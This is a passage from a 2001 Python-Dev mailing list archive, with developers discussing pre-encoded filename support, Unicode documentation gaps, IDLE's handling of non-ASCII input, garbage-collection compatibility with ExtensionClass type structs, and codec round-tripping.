> http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465&
>    group_id=5470
>
> Category: core (C code)
> Group: None
> >Status: Closed
> >Resolution: Accepted
> Priority: 5
> Submitted By: Mark Hammond (mhammond)
> Assigned to: Mark Hammond (mhammond)
> Summary: Allow pre-encoded strings as filenames
>
> Initial Comment:
> This patch enables most filename parameters to use pre-
> encoded strings.  On Windows, the default of "mbcs" is
> used.  On all other platforms, the default filename
> encoding is the same as the general default encoding,
> which in reality means there is no functional change.
> However, other platforms can simply plugin their own
> encodings.
> ...

Mark (or anyone else who understands all this), were doc changes included?
Can someone please add a briefer user-oriented blurb to Misc/NEWS too?


From tim.one at home.com  Sun May 13 22:54:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 16:54:50 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPDKBAA.tim.one@home.com>

]/F]
> as a footnote, SRE uses the same source code to generate
> both 8-bit and 16-bit versions of the match engine.  I see no
> reason why we cannot do the same for the string operations
> (PyString, PyUnicode, and strop).
>
> if anyone wants me to look into this, just say "go ahead".

go ahead

Here's another idea:  whenever we fix or extend Python's "%" formats, it
requires changes in both stringobject.c and unicodeobject.c, but they've
diverged in irritating ways that make it a fresh adventure in each.

In the early days, Python handled % formats pretty much by just building a
format string and passing that on to C's sprintf.

But as the years have gone by, and the number of buggy platforms increased,
Python has taken over more & more of it itself.  For example, it doesn't
trust sprintf to deal with justification, 0-fill or blank-fill, and needed to
grow its own from-scratch code for integer conversion in order to handle
Python longs.  In addition, it also grew a PyErr_Format() routine as yet
another layer of simulating what a safe sprintf-alike should do.  Even with
all that, we've still got platform bugs due to, e.g., platform %#x and %#o
conversion adding base markers when "they shouldn't" (according to C), or not
adding them when "they should" (according to Python).

All in all, the code would be simpler and quicker now if we left the platform
sprintf out of sprintf operations entirely <wink>.  The only thing we're not
simulating ourselves is float->string conversion.  Unfortunately, we can't do
that without also doing string->float, because platforms vary in the float
strings they can read back (e.g., if Python does float->string and produces
"Inf" for positive infinity, but uses strtod or atof to read floats back in,
it's a x-platform crapshoot whether "Inf" can be read back in).

but-in-favor-of-merging-the-code-even-without-that-ly y'rs  - tim


From tim.one at home.com  Sun May 13 23:00:32 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 17:00:32 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPDKBAA.tim.one@home.com>

[skip at pobox.com]
> I (thankfully) gave up even pretending to run Windows recently, so
> I can only make a suggestion for others who look into this problem.
> Try this:
> Change test___all__.check_all so that the except clause reads:
>
>     except ImportError, msg:
>
> then print out msg when an import fails.  You should get the actual
> module that failed to import.

Yes, that confirmed termios was the culprit.  Thanks!  Fixed by adding

import termios
del termios

in pty.py.  As the irritated comment before this new code says, this is
absurd.

since-you're-on-a-roll-how-about-fixing-test_urllib2-too<wink>-ly
    y'rs  - tim


From guido at digicool.com  Mon May 14 00:26:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:26:39 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200."
             <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>  
            <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com>

> > Now, if you are using the 1.4 version of ExtensionClasses you might
> > not have the tp_flags field either (I don't know, I can't easily
> > check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> > even require recompilation to work with Python 2.1.
> 
> I'll attach a copy below of the struct as defined in
> pygtk-0.7.0-unstable-dont-use.tar.gz

Hmm...  I like that filename. :-)

> (0.6.6 does not use extension
> classes). As you can see, it does not provide tp_flags, but has a
> field of tp_xxx4 for it.

Sorry, that's what I meant.  This is guaranteed to be initialized to 0
(unless a module goes out of its way to put a value in it, in which
case they deserve what they get).

> That *should* work, except that it also has its 'methods' field where
> tp_traverse would go, and its class_flags field where tp_clear would
> go.
> 
> Now, you write
> 
> > ExtensionClasses (at least recent versions that worked with 1.5.2)
> > contain a copy of the type object up to and including the tp_flags
> > field, and the 2.1 code is careful not to use any newer fields
> > without first checking the corresponding flag bit.
> 
> In this generality, it is apparently not true: Modules/gcmodule.c has,
> in delete_garbage,
> 
> 			if ((clear = op->ob_type->tp_clear) != NULL) {
> ...
> 		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
> 		(void) traverse(PyObject_FROM_GC(gc),
> 			       (visitproc)visit_decref,
> 			       NULL);
> 
> which does not check any flags. That still shouldn't cause any
> problems, since the Gtk objects should never end up in the GC lists -
> but may be I'm missing something.

I agree with your analysis: op here is gotten from a PyGC_Head, so it
cannot be a PyExtensionClass instance, so Neil's code should be safe.
Objects never have a GC head unless they specifically request it;
PyExtensionClass certainly doesn't request a GC head.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:37:44 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:37:44 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400."
             <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
References: <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com>

>  As I said earlier: the only advantage would be if it could simplify 
> things "under the hood" (compared to metaclasses) but could still 
> provide the same Class semantics (with maybe a "proto" declaration
> sneaking it's nose in under the tent.) 
>  But I have no immediate idea on how to do that, and it sounds like
> you're pretty far along into an implementation already. 

I don't know how to do it either, but I suspect it wouldn't be easy.

>  I guess my practical quesion, which I meant to ask before I got
> myself sidetracked into preaching prototypes is: How much of the
> existing plumbing (specifically the Don Beaudry hack) can I rely
> on in the future for the objective-C/python bridge ? 
>  With BOOST and Zope's extension classes relying on it, can I 
> assume that it's being extended rather than replaced ? 
> ( I guess I ought to take a look at the code! ) 

I'm currently not too concerned with backwards compatibility, and Jim
Fulton has proclaimed that he would prefer to get rid of
ExtensionClassess (since what I'm building goes way beyond them!), so
I'm not sure I can be motivated to support just for BOOST's sake.
There will be a replacement mechanism that will be at least as
powerful, and I'm sure that BOOST etc. can be rewritten to use the new
mechanism easily.  That's what we're planning for Zope.

> Guido: did you ever imagine back at that first workshop at NIST
> that you and Python would be where you are today ? 

No way!  I knew I was on to something, but I had no idea onto what...
I'll always hold on to the T-shirt you made.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:43:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:43:57 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200."
             <00ca01c0da68$4fc66570$e46940d5@hagrid> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com>  
            <00ca01c0da68$4fc66570$e46940d5@hagrid> 
Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com>

> 2.2 is to be released in october, right?  I'm sure I could shake
> out the remaining bugs in my "stackless SRE" patch until then...

Knowing you that means you'd start working on them late September. :-)

There's actually a possibility that if my types/classes stuff goes
well, Digital Creations will ask for a 2.2 release sooner (e.g. July).
This might have an experimental status, e.g. it might not be backwards
compatible, but it would be the version required by Zope 2.4.  On the
other hand, none of that may happen, or that release would be labeled
2.2b1 or something, or Zope 2.4 might come out after October.

What I'm trying to say is, please try to fix stackless SRE sooner
rather than later!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:51:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:51:17 -0500
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200."
             <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com>

> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='??'
> UnicodeError: ASCII encoding error: ordinal not in range(128)

This doesn't bother me, because I don't know how to enter such
characters with my US keyboard anyway. :-) :-)

> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.

Yes, this has bitten me once.  It was very painful (I lost a few hours
worth of writing).

In other words, I agree it's a problem!

> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.

Not me -- unfortunately, there are too many alternatives to IDLE to
be able to justify working on it much.

> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

Ditto.

Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
Python prompt, both on Linux and on Windows 98.  It prints as
'\xe4\xf6' on both systems.  What changed?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Mike.Olson at fourthought.com  Mon May 14 03:02:03 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 19:02:03 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>
Message-ID: <3AFF2E8B.31B9ED97@FourThought.com>

"Martin v. Loewis" wrote:
> 
> > What if we put these on the implementation, that or came up with a
> > standard interface on the node.  Then, every DOM imp that wants to be
> > compatible with xpath/xslt needs to support this interface?
> >
> >
> > node.ownerDocument.implementation.releaseNode(node)
> >
> > or
> >
> > node.py_unlink()
> 
> releaseNode sounds good to me; it is unlikely that W3C would give an
> operation that name but a different meaning. Any objections?


Should we standardize all of the python xml extensions with a py
prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
worry about a name clash.

Mike
> 
> Regards,
> Martin

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From MarkH at ActiveState.com  Mon May 14 03:37:35 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 11:37:35 +1000
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>

[Tim]
> Mark (or anyone else who understands all this), were doc changes included?
> Can someone please add a briefer user-oriented blurb to Misc/NEWS too?

No problem.

Where should the "real" documentation go?  It seems maybe we need a new
sub-heading under the "6.1 - os -- Misc. OS Interface" - something like:

6.1.x - Unicode and the file system
  - general discussion.
  - Windows specific
  - Mac specific should that appear.
  - OS' with no special support (ie, "the rest")

Does that make sense?

I have made this change to Misc/NEWS.  Does this look OK (obviously once I
know what to replace "[????]" with :)

And-I-will-do-the-registry-docs-at-the-same-time ly,

Mark.

Index: NEWS
===================================================================
RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v
retrieving revision 1.166
diff -r1.166 NEWS
4a5,21
> - Some operating systems now support the concept of a default Unicode
>   encoding for file system operations.  Notably, Windows supports 'mbcs'
>   as the default.  The Macintosh will also adopt this concept in the
medium
>   term, altough the default encoding for that platform will be other than
>   'mbcs'.
>   On operating system that support non-ascii filenames, it is common for
>   functions that return filenames (such as os.listdir()) to return Python
>   string objects pre-encoded using the default file system encoding for
>   the platform.  As this encoding is likely to be different from Python's
>   default encoding, converting this name to a Unicode object before
passing
>   it back to the Operating System would result in a Unicode error, as
Python
>   would attempt to use it's default encoding (generally ASCII) rather
>   than the default encoding for the file system.
>   In general, this change simply removes surprises when working with
>   Unicode and the file system, making these operations work as
>   you expect, increasing the transparency of Unicode objects in this
context.
>   See [????] for more details, including examples.


From tim.one at home.com  Mon May 14 04:52:22 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 22:52:22 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>

[Mark Hammond]
> ...
> Where should the "real" documentation go?  It seems maybe we need a
> new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> like:
>
> 6.1.x - Unicode and the file system
>   - general discussion.
>   - Windows specific
>   - Mac specific should that appear.
>   - OS' with no special support (ie, "the rest")
>
> Does that make sense?

So far is it goes, yes.  I think the manual desperately needs a Unicode
section for other reasons, though:  from traffic on c.l.py, it's clear that
few people can figure out how to do *anything* with Unicode now unless their
first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
<wink>).  There's no overview and there are no examples.  The primary string
method doesn't even mention Unicode (here paraphrasing questions that pop
up):

    encode([encoding[,errors]])
    Return an encoded version of the string.

What does "encoded version" mean?  Is that another string?  An encoding
object of some sort?  Etc.

    Default encoding is the current default string encoding.

What's the "current default string encoding"?  How can I find out?  Can't
even guess what *type* it has (string? magic object? little integer?).  If I
don't want the default encoding, how do I specify a different one?  What are
the possible values?  Again, can't even guess the type of the object that
needs to be passed for encoding.

    errors may be given to set a different error handling scheme.
    The default for errors is 'strict', meaning that encoding
    errors raise a ValueError. Other possible values are 'ignore'
    and 'replace'.

So what do 'ignore' and 'replace' mean?

There's more left unsaid here than a single example could clarify, but
there's not even an example -- so people stare at this wholly
uncomprehending.

If they stumble into the unicode() builtin function (in a different part of
the manual, neither referencing nor referenced by the .encode() method), it's
no better:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding.

What?  Hard to even guess what the function returns.  Maybe, from the name, a
Unicode string?

    Error handling is done according to errors.

What?

    The default behavior is to decode UTF-8 in strict mode,
    meaning that encoding errors raise ValueError.

How do encoding errors arise from a function that *de*codes?

    See also the codecs module.

Which helps, but the relationship between the codecs module and the unicode()
function isn't spelled out there either.  Look up "encdoing" in the index,
and you get pointers to base64, quoted-printable and the mimetypes module,
which only confuses things more.

I don't expect you to fix this <wink>, I'm trying to get across that the
Unicode docs need work even without new gimmicks.  If Fred agrees, I'm sure
he'll think of a good place to put the new info too.

> I have made this change to Misc/NEWS.  Does this look OK
> (obviously once I know what to replace "[????]" with :)

Absolutely, and I don't even have to read it to say so <wink>:  once
*something* is checked in, we're assured it won't get dropped on the floor
come release time, and anyone who has any quibbles with it can check in
changes.  It's not like checking in a NEWS item can break the std test suite
or cause HP-UX to crash.

well-not-really-sure-about-the-latter-ly y'rs  - tim


From barry at digicool.com  Mon May 14 06:16:18 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 00:16:18 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
	<02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <15103.23570.191115.85137@anthem.wooz.org>

>>>>> "FL" == Fredrik Lundh <fredrik at pythonware.com> writes:

    FL> (is Jython using exactly the same hashing and dictionary
    FL> algorithms as CPython?  or does it work by accident also under
    FL> Jython?)

Most likely, it's pure accident.  Jython's PyDictionary uses a Java
Hashtable underneath, so you're dependent on its behavior.

-Barry


From esr at thyrsus.com  Mon May 14 07:20:17 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 01:20:17 -0400
Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com>

A user pointed out a typo in the "Curses Programming with Python" tutorial
at <http://py-howto.sourceforge.net/curses/curses.html>.  While attempting
to fix it, I discovered a few tings:

1. Somebody seems to have removed Andrew Kuchling's namne from it.  If it
   was Andrew, that's OK -- but the reference in the latest version of the
   library docs still cites him.

2. I don't seem to have the TeX source anymore.  Where can I download it?

3. Perhaps it's time to start putting howtos in the nondist part of the
   CVS tree?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Power concedes nothing without a demand. It never did, and it never will.
Find out just what people will submit to, and you have found out the exact
amount of injustice and wrong which will be imposed upon them; and these will
continue until they are resisted with either words or blows, or with both.
The limits of tyrants are prescribed by the endurance of those whom they
oppress.
	-- Frederick Douglass, August 4, 1857


From greg at cosc.canterbury.ac.nz  Mon May 14 07:36:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 14 May 2001 17:36:49 +1200 (NZST)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl>
Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz>

Jack Jansen <jack at oratrix.nl>:

> MacOS (<= 9) itself doesn't have chdir, because it doesn't believe
> in current directories (by design.

Well, it does have an equivalent (HSetVol). But it's not used
much by Mac software because it's usual to work with full file
specifications at all times, at least internally.


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 07:38:24 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 07:38:24 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 19:02:03 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com>
Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de>

> Should we standardize all of the python xml extensions with a py
> prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
> worry about a name clash.

IMO, no. The entire interface together is the Python DOM mapping. In
the unlikely event of a name clash, we could still decide to rename
the DOM function, or find some other magic (e.g. overloading on the
argument count).

Regards,
Martin


From mal at lemburg.com  Mon May 14 11:02:19 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:02:19 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>
Message-ID: <3AFF9F1B.A1CDD617@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > The "right" thing to do here, is to simply remove cp875
> > from the test for round-tripping.
> 
> I'm relieved you think so, since that's what I already did <wink>.
> 
> > It is not the only encoding which fails this test, but it's not
> > our fault: the codecs were all generated from the original codec
> > maps at the Unicode.org site.
> >
> > If their mappings are broken, we can't do much about it... other
> > than to ignore the error or remove the codec altogether.
> 
> On general principle I don't like either of those -- "in the face of
> ambiguity, refuse the temptation to guess".  It's at least surprising to see
> 
> >>> unicode("?", "cp875").encode("cp875")
> '\xfd'
> >>>
> 
> now, yes?  Would it be better if an ambiguous encoding raised an exception in
> "strict" mode?  That is, a third choice is to alert users when they're
> relying on a broken part of a mapping.

The problem is: which part would raise the exception -- the
encoder or the decoder ?

Here are some more options:

* sort the items before creating the encoding table from the
  decoding one (makes the mapping stable)

* map keys which have multiple mappings in the encoding table
  to None -- this causes their usage to raise an exception
  (undefined mapping)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 14 11:15:43 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:15:43 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
Message-ID: <3AFFA23F.248517E3@lemburg.com>

Tim Peters wrote:
> 
> [Mark Hammond]
> > ...
> > Where should the "real" documentation go?  It seems maybe we need a
> > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> > like:
> >
> > 6.1.x - Unicode and the file system
> >   - general discussion.
> >   - Windows specific
> >   - Mac specific should that appear.
> >   - OS' with no special support (ie, "the rest")
> >
> > Does that make sense?
> 
> So far is it goes, yes.  I think the manual desperately needs a Unicode
> section for other reasons, though:  from traffic on c.l.py, it's clear that
> few people can figure out how to do *anything* with Unicode now unless their
> first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
> <wink>).  There's no overview and there are no examples.  The primary string
> method doesn't even mention Unicode (here paraphrasing questions that pop
> up):
> [...]

True. The main source of documentation for Unicode still is the
proposal itself (Misc/unicode.txt). It needs some reordering
and a few examples, but does contain all the information needed
to grasp what the implementation intends and how it works.

If that's still not enough, there are numerous doc-strings in
the codecs.py module, more technical docs in the API reference 
and finally the unicodeobject.h header file itself.

Another source for documentation and examples is the i18n-sig
page on python.org.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Mon May 14 11:55:26 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 14 May 2001 11:55:26 +0200
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl>

I'm not too thrilled with the way the filename encoding stuff was done, with a 
global var declared in posixmodule.c which is then used by bltinmodule.c. It 
took me quite a while to figure out why my builds were failing, and how to fix 
it. And I think other minority platforms may have the same problem, so maybe 
it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an 
include file, and do the initialization in a more "common" place?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From fredrik at pythonware.com  Mon May 14 12:18:49 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Mon, 14 May 2001 12:18:49 +0200
Subject: [Python-Dev] State of curses tutorial?
References: <20010514012017.A6971@thyrsus.com>
Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff>

eric wrote:
>
> 1. Somebody seems to have removed Andrew Kuchling's namne from it.  If it
>    was Andrew, that's OK -- but the reference in the latest version of the
>    library docs still cites him.

that would be either you (who reworked the document), or andrew
(who checked in your changes).  looks like fred has already fixed it:

    Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake

    Use appropriate markup for multiple authors; LaTeX's \author is not
    additive; the second occurrance was causing the first author to be dropped.

> 2. I don't seem to have the TeX source anymore.  Where can I download it?

it's in the py-howto CVS tree:

    http://sourceforge.net/projects/py-howto

Cheers /F


From loewis at informatik.hu-berlin.de  Mon May 14 13:29:21 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:29:21 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com>
Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de>

> I have a bug report assigned to myself which indicates similar
> problems with _tkinter and Tk/Tcl. There were other problem
> reports on the German Python mailing list going in the same
> direction too.
> 
> The basic problem seems to be that Tk/Tcl applies too much
> magic to the text widget contents in order to find out the
> used encoding and this can easily cause the whole encoding
> mechanism to fail.

This is actually a different problem. In this scenario here, the user
types non-ASCII character into a text widget, then _tkinter returns a
Unicode object (IMO rightfully so). In the other problem, the Python
program puts a byte string into a text widget, the user enters some
more characters, and _tkinter returns a byte string which does not
follow any encoding.

> A Tk/Tcl expert should really look into this and fix _tkinter.c
> to aid Tk/Tcl in not mixing up the encodings (e.g. it would
> probably be a good idea to recode Python 8bit-strings into
> whatever encoding Tk/Tcl assumes as default).

Again, this is not the issue here: Both _tkinter and Tk behave
absolutely correct IMO. The question is how IDLE should deal with it.

Regards,
Martin


From loewis at informatik.hu-berlin.de  Mon May 14 13:41:26 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:41:26 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com>
Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>

> Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

Perhaps the Tcl version? That sounds like the issue that Marc talked
about: Tk behaves differently when text is entered programmatically
(and perhaps through cut-n-paste), as compared to text entered through
the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
Solaris 8 still gives me the UnicodeError.

Regards,
Martin


From MarkH at ActiveState.com  Mon May 14 14:20:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 22:20:43 +1000
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKELCDMAA.MarkH@ActiveState.com>

> I'm not too thrilled with the way the filename encoding stuff was
> done, with a

My apologies.  I did try and publicise the patch as much as possible.  A
misguided attempt at a low-impact change :(  I have checked in the changes
you suggest.

Mark.


From barry at digicool.com  Mon May 14 14:54:59 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 08:54:59 -0400
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
	<3AFFA23F.248517E3@lemburg.com>
Message-ID: <15103.54691.560967.853132@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> True. The main source of documentation for Unicode still is the
    M> proposal itself (Misc/unicode.txt). It needs some reordering
    M> and a few examples, but does contain all the information needed
    M> to grasp what the implementation intends and how it works.

As a first step, why not PEP-ify that document, much like as has been
done with the DB-API (version 1 & 2)?  It can be an informational PEP.

-Barry


From esr at thyrsus.com  Mon May 14 17:11:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 11:11:57 -0400
Subject: [Python-Dev] State of curses tutorial?
In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200
References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff>
Message-ID: <20010514111157.C10920@thyrsus.com>

Fredrik Lundh <fredrik at pythonware.com>:
> it's in the py-howto CVS tree:
> 
>     http://sourceforge.net/projects/py-howto

What module is the Python-HOWTO in?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The best we can hope for concerning the people at large is that they be
properly armed."
        -- Alexander Hamilton, The Federalist Papers at 184-188


From skip at pobox.com  Mon May 14 17:54:54 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 14 May 2001 10:54:54 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <15103.65486.61021.328424@beluga.mojam.com>

    Martin> That *should* work, except that it also has its 'methods' field
    Martin> where tp_traverse would go, and its class_flags field where
    Martin> tp_clear would go.

Okay, so I'm completed confused now.  I extended the definition of
ECTypeType to include this after the doc string slot:

      (traverseproc)0,              /* tp_traverse */
      (inquiry)0,                   /* tp_clear */
      (richcmpfunc)0,               /* rich comparisons */
      0L,                           /* weak reference enabler */

    #ifdef COUNT_ALLOCS
      /* these must be last */
      0,                            /* tp_alloc */
      0,                            /* tp_free */
      0,                            /* tp_maxalloc */
      (struct _typeobject *)0,      /* tp_next */
    #endif

When I looked at the definition of ECType, after the doc string I saw

      METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated.  I can't simply insert the same zeroes at the end of
the ECType def'n as I did at the end of the ECTypeType definition.  Where
does this METHOD_CHAIN thing go?  I looked at the def'n of struct
_typeobject in Include/object.h but didn't see a slot that looked suitable.

FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
I get 

    Fatal Python error: UNREF invalid object

when I run my failing script.  This is with and without making any changes
to ECType or ECTypeType.

Skip


From sdm7g at Virginia.EDU  Mon May 14 19:04:56 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Mon, 14 May 2001 13:04:56 -0400 (EDT)
Subject: [Python-Dev] deprecated platforms
Message-ID: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>

Jack asked me about:

https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470

which concerns removing the support for --with-next-framework from 
the build procedure. 

I'm all for removing it: 
